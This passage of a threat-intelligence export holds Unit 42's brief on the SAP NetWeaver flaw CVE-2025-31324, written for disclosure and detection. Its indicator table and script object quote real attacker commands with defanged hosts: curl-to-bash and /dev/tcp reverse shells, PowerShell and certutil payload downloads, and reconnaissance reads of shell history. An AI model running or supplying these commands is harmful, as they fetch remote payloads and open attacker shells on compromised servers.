        "comment": "",
        "deleted": false,
        "description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
        "meta-category": "misc",
        "name": "script",
        "template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
        "template_version": "7",
        "timestamp": "1747035849",
        "uuid": "da7c93e8-6a97-4bac-88de-58c2b3373027",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "script",
            "timestamp": "1747035849",
            "to_ids": false,
            "type": "text",
            "uuid": "8e49cabd-9459-41ec-9d51-4de49fad89dd",
            "value": "powershell Invoke-WebRequest -Uri \"hxxp://65.49.235[.]210/download/2.jpg\" -OutFile \"cmake.exe\""
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "language",
            "timestamp": "1747035849",
            "to_ids": false,
            "type": "text",
            "uuid": "ead3fea9-d385-4b03-a276-46b070ed8ddc",
            "value": "PowerShell"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "comment",
            "timestamp": "1747035849",
            "to_ids": false,
            "type": "text",
            "uuid": "e9b92f57-a915-4af4-902a-df581e9ede9c",
            "value": "Attempting to download unknown payload"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1747035849",
            "to_ids": false,
            "type": "text",
            "uuid": "27180fb1-1a7c-4fec-9f96-effa0380092b",
            "value": "Malicious"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Report object to describe a report along with its metadata.",
        "meta-category": "misc",
        "name": "report",
        "template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df",
        "template_version": "8",
        "timestamp": "1747036234",
        "uuid": "801608d4-f710-43af-ad35-7f435790b912",
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "link",
            "timestamp": "1747036234",
            "to_ids": false,
            "type": "link",
            "uuid": "a379af01-7463-48fb-9f7d-22797cde3366",
            "value": "https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "summary",
            "timestamp": "1747036234",
            "to_ids": false,
            "type": "text",
            "uuid": "ed97f7b6-e523-4a1f-80ee-29469ab5a040",
            "value": "On April 24, 2025, SAP disclosed CVE-2025-31324, a critical vulnerability with a CVSS score of 10.0 affecting the SAP NetWeaver's Visual Composer Framework, version 7.50. This threat brief shares a brief overview of the vulnerability and our analysis, and also includes details of what we\u2019ve observed through our incident response services and telemetry.\r\n\r\nThis vulnerability allows unauthenticated users to upload arbitrary files to an SAP NetWeaver application server, leading to potential remote code execution (RCE) and full system compromise. Exploitation is achieved by sending specially crafted HTTP requests to the /developmentserver/metadatauploader endpoint. We have observed attackers leveraging this vulnerability to deploy web shells (e.g., helper.jsp and cache.jsp) for persistent access and subsequent command execution.\r\n\r\nIn our incident response cases and telemetry, we observed attackers exploiting this vulnerability to deploy, for example, reverse shell tools and a reverse SSH SOCKS proxy using a variety of network infrastructure.\r\n\r\nWe recommend that users of SAP NetWeaver refer to official documentation and instructions from SAP for guidance.\r\n\r\nPalo Alto Networks customers receive protections from and mitigations for CVE-2025-31324 in the following ways:\r\n\r\n    The Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block attacks using best practices via Threat Prevention signature 96181.\r\n    Cortex Xpanse has the ability to identify internet-exposed SAP NetWeaver applications, including version information, on the public internet and escalate these findings to defenders. These findings are also available for Cortex XSIAM customers who have purchased the ASM module.\r\n    Advanced URL Filtering and Advanced DNS Security identify known domains and IP addresses associated with this activity as malicious.\r\n\r\nThe Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk."
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "title",
            "timestamp": "1747036234",
            "to_ids": false,
            "type": "text",
            "uuid": "8a0a0dc7-9624-4ae2-b42e-ce8283179703",
            "value": "Threat Brief: CVE-2025-31324"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "type",
            "timestamp": "1747036234",
            "to_ids": false,
            "type": "text",
            "uuid": "ae897d0f-a315-4655-81cb-ad12d654f310",
            "value": "Blog"
          }
        ]
      }
    ],
    "EventReport": [
      {
        "name": "Report from - https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/ (1747035879)",
        "content": "# Threat Brief: CVE\\-2025\\-31324\r\n## Executive Summary\r\n\r\n\r\nOn April 24, 2025, SAP disclosed CVE\\-2025\\-31324, a critical vulnerability with a CVSS score of 10\\.0 affecting the SAP NetWeaver's Visual Composer Framework, version 7\\.50\\. This threat brief shares a brief overview of the vulnerability and our analysis, and also includes details of what we\u2019ve observed through our incident response services and telemetry.\r\n\r\n\r\nThis vulnerability allows unauthenticated users to upload arbitrary files to an SAP NetWeaver application server, leading to potential remote code execution (RCE) and full system compromise. Exploitation is achieved by sending specially crafted HTTP requests to the /developmentserver/metadatauploader endpoint. We have observed attackers leveraging this vulnerability to deploy web shells (e.g., helper.jsp and cache.jsp) for persistent access and subsequent command execution.\r\n\r\n\r\nIn our incident response cases and telemetry, we observed attackers exploiting this vulnerability to deploy, for example, reverse shell tools and a reverse SSH SOCKS proxy using a variety of network infrastructure.\r\n\r\n\r\nWe recommend that users of SAP NetWeaver refer to official documentation and instructions from SAP for guidance.\r\n\r\n\r\nPalo Alto Networks customers receive protections from and mitigations for CVE\\-2025\\-31324 in the following ways:\r\n\r\n\r\n* The Next\\-Generation Firewall with the Advanced Threat Prevention security subscription can help block attacks using best practices via Threat Prevention signature 96181.\r\n* Cortex Xpanse has the ability to identify internet\\-exposed SAP NetWeaver applications, including version information, on the public internet and escalate these findings to defenders. These findings are also available for Cortex XSIAM customers who have purchased the ASM module.\r\n* Advanced URL Filtering and Advanced DNS Security identify known domains and IP addresses associated with this activity as malicious.\r\n\r\n\r\nThe Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.\r\n\r\n\r\n\r\n\r\n| **Vulnerabilities Discussed** | CVE\\-2025\\-31324 |\r\n| --- | --- |\r\n\r\n\r\n## Details of CVE\\-2025\\-31324\r\n\r\n\r\nCVE\\-2025\\-31324 is a critical vulnerability residing in the SAP NetWeaver Application Server Java's Visual Composer component (VCFRAMEWORK). While not installed by default, business analysts commonly use this component to create applications without coding, making it widely present in SAP deployments.\r\n\r\n\r\nThe core issue with this vulnerability is a missing authorization check in the Metadata Uploader, accessible via the /developmentserver/metadatauploader endpoint. This means that any user, even unauthenticated ones, can interact with this endpoint and upload arbitrary files to the server.\r\n\r\n\r\nHere's a breakdown of how the vulnerability works:\r\n\r\n\r\n**Unrestricted access**: The /developmentserver/metadatauploader endpoint is exposed over HTTP/HTTPS and lacks proper authentication or authorization controls.\r\n\r\n\r\n**Malicious file upload**: An attacker can send a specially crafted HTTP request to the vulnerable endpoint, containing a malicious file as the request body.\r\n\r\n\r\n**File system access**: Due to the missing authorization check, the server accepts the attacker's request and writes the uploaded file to the server's file system. The file is often written to a location within the web application's accessible directories (e.g., under /irj/servlet\\_jsp/irj/root/).\r\n\r\n\r\n**Web shell execution (common scenario)**: If the attacker uploads a web shell like a Java server page (JSP) file, the attacker can then access the web shell via a web browser. Now residing on the server, this web shell allows an attacker to execute arbitrary operating system commands with the privileges of the SAP application server process.\r\n\r\n\r\n**System compromise**: With the ability to execute commands as an SAP system administrator (system account name: sidadm), an attacker effectively gains control of the SAP system and its associated data. The attacker can then perform various malicious activities.\r\n\r\n\r\nCVE\\-2025\\-31324 allows attackers to bypass security controls and directly upload and execute malicious files on vulnerable SAP servers, potentially leading to complete system compromise. The ease of exploitation (no authentication required) and the possibility for high impact make this a critical vulnerability that requires immediate attention and remediation.\r\n\r\n\r\n## Current Scope of Attacks Utilizing CVE\\-2025\\-31324\r\n\r\n\r\nIn line with industry observations, we saw suspicious HTTP requests to the /developmentserver/metadatauploader endpoint on SAP NetWeaver systems in late January 2025 that were likely testing this vulnerability before its disclosure. Following a lull in activity, a threat actor exploited this vulnerability starting in mid\\-March 2025 to deploy JSP web shells, with names such as cache.jsp and help.jsp.\r\n\r\n\r\nUnsurprisingly, following the public disclosure of this vulnerability, we saw a variety of attacks exploiting this vulnerability and attempting to send different payloads to the server.\r\n\r\n\r\nWe observed two stages of post\\-compromise activity:\r\n\r\n\r\n* Reconnaissance\r\n* Tool deployment\r\n\r\n\r\n### Reconnaissance\r\n\r\n\r\nFollowing a successful exploit and initial web shell, attackers have used a variety of common reconnaissance commands to gather information about the compromised systems and the surrounding network. Commands observed during intrusions include:\r\n\r\n\r\n* cat /etc/hosts\r\n* cat /etc/resolv.conf\r\n* cat \\~/.bash\\_history\r\n* cat /etc/issue\r\n* crontab \\-l\r\n* ps \\-ef\r\n* df \\-a\r\n* last \\-n 30\r\n* netstat \\-tenp\r\n* nltest /domain\r\n* uname \\-a\r\n* ls /mnt\r\n* ls /var\r\n* ls /opt\r\n\r\n\r\n### Tool Deployment\r\n\r\n\r\nThe majority of initial post\\-exploitation activity centered around the deployment and use of web shells. While above we noted web shells named helper.jsp and cache.jsp, attackers also deployed other JSP files for web shells.\r\n\r\n\r\nOne such sample is named ran.jsp, shown in Figure 1\\. This is a simple JSP file capable of executing commands sent as the cmd parameter. The results of these commands are returned as HTML text, if the correct key parameter is supplied.\r\n\r\n\r\n\r\n\r\nFigure 1\\. Content of the ran.jsp web shell.\r\n\r\n\r\n#### GOREVERSE\r\n\r\n\r\nWe have also observed attackers deploying other reverse shell tools with the filename config. These include a publicly available tool that Google calls GOREVERSE. Based on the project's GitHub page, GOREVERSE has the following capabilities:\r\n\r\n\r\n* Managing and connecting to reverse shells with native SSH syntax\r\n* Dynamic, local and remote forwarding\r\n* Native SCP and SFTP implementations for retrieving files from the targets\r\n* Full Windows shell\r\n* Multiple network transports, such as HTTP, web sockets and TLS\r\n* Mutual client and server authentication to create high\\-trust control channels\r\n\r\n\r\nThe sample we observed was a 64\\-bit ELF binary that was obfuscated using another open\\-source tool called Garble. In this instance, the threat actor first downloaded a shell script config.sh to the compromised SAP server using the initial helper.jsp webshell. The shell script was downloaded from ocr\\-freespace.oss\\-cn\\-beijing.aliyuncs\\[.]com and is shown below in Figure 2\\.\r\n\r\n\r\n\r\n\r\nFigure 2\\. Content of config.sh shell script.\r\n\r\n\r\nThis GOREVERSE sample uses a hard\\-coded C2 address and port number of 47\\.97\\.42\\[.]177:3232. The IP address 47\\.97\\.42\\[.]177 has also been associated with malware based on the open\\-source tool SUPERSHELL. Further analysis of CVE\\-2025\\-31324 exploitation activity involving this IP address (including potential attribution to a threat actor likely based in China) has been highlighted in reporting by Forescout.\r\n\r\n\r\n#### Reverse SSH SOCKS Proxy\r\n\r\n\r\nWe observed an attacker execute the following PowerShell command to download a suspicious payload as shown in Figure 3\\.\r\n\r\n\r\n\r\n\r\nFigure 3\\. PowerShell command to download suspicious payload.\r\n\r\n\r\nThe domain pages\\[.]dev is used by a legitimate Cloudflare service that can deploy websites. In this example, d\\-69b.pages\\[.]dev hosted a Base64\\-encoded PowerShell script. The decoded script performs several actions:\r\n\r\n\r\n* Retrieves the compromised system\u2019s domain name and username, which an attacker uses to name a private key\r\n* Kills any running ssh.exe and sshd.exe processes\r\n* Creates temporary directories to download and store OpenSSH files from GitHub\r\n* Generates SSH keys, and uploads the local private key to the attacker\u2019s hard\\-coded C2 server 45\\.76\\.93\\[.]60\r\n* Uses ssh.exe to establish a remote tunnel to the C2 server.\r\n\r\n\r\n## Conclusion\r\n\r\n\r\nBased on the ease of exploiting the vulnerability and potential for high impact, we recommend taking steps to protect your organization. We recommend that users of SAP NetWeaver refer to official documentation and instructions from SAP for guidance.\r\n\r\n\r\nUnit 42 will continue to monitor exploitation of this vulnerability and update this threat brief as appropriate.\r\n\r\n\r\nPalo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.\r\n\r\n\r\n## Palo Alto Networks Product Protections for CVE\\-2025\\-31324\r\n\r\n\r\nPalo Alto Networks customers are better protected by our products, as listed below.\r\n\r\n\r\nIf you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:\r\n\r\n\r\n* North America: Toll Free: \\+1 (866\\) 486\\-4842 (866\\.4\\.UNIT42\\)\r\n* UK: \\+44\\.20\\.3743\\.3660\r\n* Europe and Middle East: \\+31\\.20\\.299\\.3130\r\n* Asia: \\+65\\.6983\\.8730\r\n* Japan: \\+81\\.50\\.1790\\.0200\r\n* Australia: \\+61\\.2\\.4062\\.7950\r\n* India: 00080005045107\r\n\r\n\r\n### Next\\-Generation Firewalls and Prisma Access With Advanced Threat Prevention\r\n\r\n\r\nNext\\-Generation Firewall with the Advanced Threat Prevention security subscription can help block attempted exploitation of CVE\\-2025\\-31324 via the following Threat Prevention signature: 96181.\r\n\r\n\r\n### Cortex Xpanse\r\n\r\n\r\nCortex Xpanse has the ability to identify internet\\-exposed SAP NetWeaver applications, including version information, on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the \u201cSAP NetWeaver Application Server\u201d Attack Surface Rule is enabled.\r\n\r\n\r\nAdditionally, an Attack Surface Test named \"SAP NetWeaver Visual Composer Metadata Uploader Arbitrary File Upload Vulnerability\" is available, which can be run against exposed applications to provide confirmation of exploitability for this vulnerability.\r\n\r\n\r\nThese findings are also available for Cortex XSIAM customers who have purchased the ASM module.\r\n\r\n\r\n### Cloud\\-Delivered Security Services for the Next\\-Generation Firewall\r\n\r\n\r\nDomains and IP addresses associated with this malicious activity are categorized as malicious by Advanced URL Filtering and Advanced DNS Security.\r\n\r\n\r\n## Indicators of Compromise\r\n\r\n\r\n\r\n\r\n| **Indicator** | **Data** | **Note** |\r\n| --- | --- | --- |\r\n| IPv4 address | 205\\.169\\.39\\[.]55 | Tested exploit in January 2025 |\r\n| IPv4 address | 206\\.188\\.197\\[.]52 | Exploited vulnerability and deployed web shells in March 2025 |\r\n| IPv4 address | 65\\.49\\.235\\[.]210 | Hosting suspicious payload |\r\n| IPv4 address | 108\\.171\\.195\\[.]163 | Hosting suspicious payload |\r\n| IPv4 address | 47\\.97\\.42\\[.]177 | GOREVERSE C2 |\r\n| IPv4 address | 45\\.76\\.93\\[.]60 | Reverse SSH SOCKS proxy C2 |\r\n| IPv4 address | 158\\.247\\.224\\[.]100 | Hosting suspicious payload |\r\n| IPv4 address | 31\\.192\\.107\\[.]157 | Hosting suspicious payload |\r\n| IPv4 address | 107\\.173\\.135\\[.]116 | Attempted GET requests against several already reported web shell names |\r\n| IPv4 address | 192\\.3\\.153\\[.]18 | Attempted GET requests against several already reported web shell names to download reported Supershell malware from the domain overseas\\-recognized\\-athens\\-oakland\\[.]trycloudflare |\r\n| IPv4 address | 188\\.166\\.87\\[.]88 | Attempted GET requests against several already reported web shell names |\r\n| IPv4 address | 223\\.184\\.254\\[.]150 | Attempted GET requests against several already reported web shell names |\r\n| IPv4 address | 51\\.79\\.66\\[.]183 | Attempted GET requests against several already reported web shell names |\r\n| IPv4 address | 85\\.106\\.113\\[.]168 | Attempted GET requests against the helper.jsp web shell to download and execute a bash command from 138\\.68\\.61\\[.]82 |\r\n| IPv4 address | 138\\.68\\.61\\[.]82 | Reverse shell C2 |\r\n| IPv4 address | 101\\.99\\.91\\[.]107 | Attempted GET requests against several already reported web shell names |\r\n| IPv4 address | 103\\.207\\.14\\[.]195 | Attempted GET requests against several already reported web shell names |\r\n| IPv4 address | 13\\.232\\.191\\[.]219 | Attempted GET requests against several already reported web shell names |\r\n| FQDN | ocr\\-freespace.oss\\-cn\\-beijing.aliyuncs\\[.]com | Hosted GOREVERSE payload |\r\n| FQDN | overseas\\-recognized\\-athens\\-oakland.trycloudflare\\[.]com | Hosted reported SUPERSHELL payload |\r\n| FQDN | d\\-69b.pages\\[.]dev | Hosting suspicious payload |\r\n| Command | curl 138\\.68\\.61\\[.]82\\|bash | Downloads and executes this command bash \\-i \\>\\& /dev/tcp/138\\.68\\.61\\[.]82/4544 0\\>\\&1 |\r\n| Command | bash \\-i \\>\\& /dev/tcp/138\\.68\\.61\\[.]82/4544 0\\>\\&1 | Establishes reverse shell from a compromised SAP server |\r\n| Command | curl \\-sk hxxps://overseas\\-recognized\\-athens\\-oakland.trycloudflare\\[.]com/v2\\.js \\|\\| wget \\-\\-no\\-check\\-certificate \\-q \\-O \\- hxxps://overseas\\-recognized\\-athens\\-oakland.trycloudflare\\[.]com/v2\\.js) \\| bash \\-sh | Attempted to download reported SUPERSHELL payload |\r\n| Command | powershell Invoke\\-WebRequest \\-Uri \"hxxp://31\\.192\\.107\\[.]157:38205/ReportQueue.exe\" \\-OutFile \"C:\\\\programdata\\\\ReportQueue.exe\" | Attempting to download a suspicious payload |\r\n| Command | powershell Invoke\\-WebRequest \\-Uri \"hxxp://158\\.247\\.224\\[.]100:38205/EACA38DB.tmp\" \\-OutFile \"C:\\\\programdata\\\\EACA38DB.tmp\" | Attempting to download a suspicious payload |\r\n| Command | powershell curl \\-o \"C:\\\\users\\\\public\\\\ansgdhs.bat\" hxxp://101\\.32\\.26\\[.]154/rymhNszS/ansgdhs.bat | Attempting to download a malicious Batch file |\r\n| Command | powershell IEX(New\\-Object Net.WebClient).DownloadString('hxxps://d\\-69b.pages\\[.]dev/sshb64\\.ps1') | Attempting to download a malicious PowerShell script |\r\n| Command | certutil.exe \\-urlcache \\-split \\-f hxxp://108\\.171\\.195\\[.]163:8000/$FILE\\_NAME$.txt \\~\\\\sap.com\\\\irj\\\\servlet\\_jsp\\\\irj\\\\root\\\\Logout.jsp | Attempting to download suspicious payload |\r\n| Command | powershell (new\\-object Net.WebClient).DownloadFile('hxxp://108\\.171\\.195\\[.]163:8000/$FILE\\_NAME$.txt ,'\\~\\\\sap.com\\\\irj\\\\servlet\\_jsp\\\\irj\\\\root\\\\Logout.jsp') | Attempting to download suspicious payload |\r\n| Command | powershell Invoke\\-WebRequest \\-Uri \"hxxp://65\\.49\\.235\\[.]210/download/2\\.jpg\" \\-OutFile \"cmake.exe\" | Attempting to download unknown payload |\r\n| SHA256 hash | df492597eb412c94155a7f437f593aed89cfec2f1f149eb65174c6201be69049 | Downloaded from 101\\.32\\.26\\[.]15 named shell.jsp |\r\n| SHA256 hash | 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d | Downloaded by ansgdhs.bat named 0g9pglZr74\\.ini. This suspicious file is downloaded from 101\\.32\\.26\\[.]15\\. |\r\n| SHA256 hash | c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28 | Downloaded by ansgdhs.bat named wbemcomn.dll this suspicious file is downloaded from 101\\.32\\.26\\[.]154 and is possibly side\\-loaded |\r\n| SHA256 hash | 3f5fd4b23126cb21d1007b479954af619a16b0963a51f45cc32a8611e8e845b5 | Batch file downloaded from 101\\.32\\.26\\[.]154 named ansgdhs.bat |\r\n| SHA256 hash | 598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0 | JSP webshell named helper.jsp and usage.jsp |\r\n| SHA256 hash | 888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef | GOREVERSE reverse shell, named config |\r\n| SHA256 hash | 5919F2EAB8A826D7BA84E6C413626F5D11ED412D7DF0D3AB864F31D3A8DB3763 | Batch script that attempts to download GOREVERSE and executes it |\r\n| SHA256 hash | 5a8ddc779dcf124fe5692d15be44346fb6d742322acb0eb3c6b4e90f581c5f9e | Payload downloaded from 65\\.49\\.235\\[.]210 named 2\\.jpg |\r\n| SHA256 hash | 427877aadd89f427e1815007998d9bb88309c548951a92a6e4064df001e327c2 | Base64\\-encoded PowerShell Script downloaded from d\\-69b.pages\\[.]dev named sshb64\\.ps1 that creates reverse SSH SOCKS proxy |\r\n| SHA256 hash | 69bb809b3fee09ed3ec9138f7566cc867bd6f1e8949b5e3daff21d451c533d75 | JSP web shell named ran.jsp |\r\n| SHA256 hash | b9ef95ca541d3e05a6285411005f5fee15495251041f78e715234b09d019b92c | Suspected web shell |\r\n| SHA256 hash | 1abf922a8228fd439a72cfddf1ed08ea09b59eaa4ae5eeba1d322d5f3e3c97e8 | Suspected web shell |\r\n| SHA256 hash | 2e6f348f8296f4e062c397d2f3708ca6fdeab2c71edfd130b2ca4c935e53c0d3 | Suspected web shell |\r\n| SHA256 hash | 6c6c984727dc53af110ed08ec8b15092facb924c8ad62e86ec76b52a00a41a40 | Suspected web shell |\r\n| SHA256 hash | 4b17beee8c2d94cf8e40efc100651d70d046f5c14a027cf97d845dc839e423f9 | Suspected web shell |\r\n| SHA256 hash | 7aab6ec707988ff3eec37f670b6bb0e0ddd02cc0093ead78eb714abded4d4a79 | Suspected web shell |\r\n| SHA256 hash | b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee | Suspected web shell |\r\n\r\n\r\n\u00a0\r\n\r\n\r\n\r\n\r\nBack to top\r\n\r\n### Tags\r\n\r\n* CVE\\-2025\\-31324\r\n* Remote Code Execution\r\n* Web shells\r\n\r\n\r\n\r\n\r\n\r\nThreat Research Center\r\n\r\n\r\nNext: Stealthy .NET Malware: Hiding Malicious Payloads as Bitmap Resources\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n### Table of Contents\r\n\r\n\r\n\r\n* \r\n\r\n\r\n\r\n\r\n### Related Articles\r\n\r\n\r\n* Squidoor: Suspected Chinese Threat Actor\u2019s Backdoor Targets Global Organizations\r\n* CL\\-STA\\-0048: An Espionage Operation Against High\\-Value Targets in South Asia\r\n* Lateral Movement on macOS: Unique and Popular Techniques and In\\-the\\-Wild Examples\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n## Related Vulnerabilities Resources\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\nTrend Reports April 9, 2025\r\n\r\n#### How Prompt Attacks Exploit GenAI and How to Fight Back\r\n\r\n\r\n\r\n* LLM\r\n* GenAI\r\n* Prompt injection\r\n\r\n \r\n\r\n\r\n Read now \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\nThreat Research March 7, 2025\r\n\r\n#### Multiple Vulnerabilities Discovered in a SCADA System\r\n\r\n\r\n\r\n* CVE\\-2024\\-1182\r\n* CVE\\-2024\\-7587\r\n* CVE\\-2024\\-8299\r\n\r\n \r\n\r\n\r\n Read now \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\nThreat Research February 21, 2025\r\n\r\n#### Investigating LLM Jailbreaking of Popular Generative AI Web Products\r\n\r\n\r\n\r\n* Jailbroken\r\n* GenAI\r\n* LangChain\r\n\r\n \r\n\r\n\r\n Read now \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\nThreat Research February 19, 2025\r\n\r\n#### Multiple Vulnerabilities Discovered in NVIDIA CUDA Toolkit\r\n\r\n\r\n\r\n* CUDA\r\n* Cuobjdump\r\n* CVE\\-2024\\-53870\r\n\r\n \r\n\r\n\r\n Read now \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\nHigh Profile Threats January 16, 2025\r\n\r\n#### Threat Brief: CVE\\-2025\\-0282 and CVE\\-2025\\-0283 (Updated March 11\\)\r\n\r\n\r\n\r\n* Ivanti\r\n\r\n \r\n\r\n\r\n Read now \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\nHigh Profile Threats November 22, 2024\r\n\r\n#### Threat Brief: Operation Lunar Peek, Activity Related to CVE\\-2024\\-0012 and CVE\\-2024\\-9474 (Updated Nov. 22\\)\r\n\r\n\r\n\r\n* PAN\\-OS\r\n\r\n \r\n\r\n\r\n Read now \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\nThreat Research October 23, 2024\r\n\r\n#### Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction\r\n\r\n\r\n\r\n* Jailbroken\r\n* LLM\r\n* GenAI\r\n\r\n \r\n\r\n\r\n Read now \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\nThreat Research October 17, 2024\r\n\r\n#### Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism\r\n\r\n\r\n\r\n* Apple\r\n\r\n \r\n\r\n\r\n Read now \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\nThreat Research August 12, 2024\r\n\r\n#### Harnessing LLMs for Automating BOLA Detection\r\n\r\n\r\n\r\n* API\r\n* LLM\r\n* GenAI\r\n\r\n \r\n\r\n\r\n Read now \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n* \r\n* \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n Get updates from Unit 42 \r\n## Peace of mind comes from staying ahead of threats. Contact us today.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nYour Email\r\n\r\n\r\nSubscribe for email updates to all Unit 42 threat research.  \r\nBy submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.\r\n\r\n\r\n\r\nInvalid captcha!\r\n\r\n\r\n \r\n Subscribe \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n## Get the latest news, invites to events, and threat alerts\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nEnter your email now to subscribe!\r\n\r\n\r\n\r\n\r\n\r\nSign up \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n By submitting this form, you agree to our\r\n Terms of Use\r\n and acknowledge our\r\n Privacy Statement.\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\nSign up \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n## Products and Services\r\n\r\n\r\n\r\n\r\n* AI\\-Powered Network Security Platform\r\n* Secure AI by Design\r\n* Prisma AIRS\r\n* AI Access Security\r\n* Cloud Delivered Security Services\r\n* Advanced Threat Prevention\r\n* Advanced URL Filtering\r\n* Advanced WildFire\r\n* Advanced DNS Security\r\n* Enterprise Data Loss Prevention\r\n* Enterprise IoT Security\r\n* Medical IoT Security\r\n* Industrial OT Security\r\n* SaaS Security\r\n\r\n\r\n* Next\\-Generation Firewalls\r\n* Hardware Firewalls\r\n* Software Firewalls\r\n* Strata Cloud Manager\r\n* SD\\-WAN for NGFW\r\n* PAN\\-OS\r\n* Panorama\r\n* Secure Access Service Edge\r\n* Prisma SASE\r\n* Application Acceleration\r\n* Autonomous Digital Experience Management\r\n* Enterprise DLP\r\n* Prisma Access\r\n* Prisma Access Browser\r\n* Prisma SD\\-WAN\r\n* Remote Browser Isolation\r\n* SaaS Security\r\n\r\n\r\n* AI\\-Driven Security Operations Platform\r\n* Cloud Security\r\n* Cortex Cloud\r\n* Application Security\r\n* Cloud Posture Security\r\n* Cloud Runtime Security\r\n* Prisma Cloud\r\n* AI\\-Driven SOC\r\n* Cortex XSIAM\r\n* Cortex XDR\r\n* Cortex XSOAR\r\n* Cortex Xpanse\r\n* Unit 42 Managed Detection \\& Response\r\n* Managed XSIAM\r\n\r\n\r\n* Threat Intel and Incident Response Services\r\n* Proactive Assessments\r\n* Incident Response\r\n* Transform Your Security Strategy\r\n* Discover Threat Intelligence\r\n\r\n\r\n\r\n\r\n\r\n\r\n## Company\r\n\r\n\r\n\r\n\r\n* About Us\r\n* Careers\r\n* Contact Us\r\n* Corporate Responsibility\r\n* Customers\r\n* Investor Relations\r\n* Location\r\n* Newsroom\r\n\r\n\r\n\r\n\r\n\r\n\r\n## Popular Links\r\n\r\n\r\n\r\n\r\n* Blog\r\n* Communities\r\n* Content Library\r\n* Cyberpedia\r\n* Event Center\r\n* Manage Email Preferences\r\n* Products A\\-Z\r\n* Product Certifications\r\n* Report a Vulnerability\r\n* Sitemap\r\n* Tech Docs\r\n* Unit 42\r\n* Do Not Sell or Share My Personal Information\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nYour browser does not support the video tag.\r\n \r\n\r\n### Default Heading\r\n\r\n\r\nRead the article\r\n \r\n\r\n\r\n\r\n\r\nSeekbar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nVolume",
        "id": "1217",
        "event_id": "298871",
        "timestamp": "1747035913",
        "uuid": "0ecf183f-5f91-4506-9d42-0dd93573d099",
        "deleted": false
      }
    ]
  }
}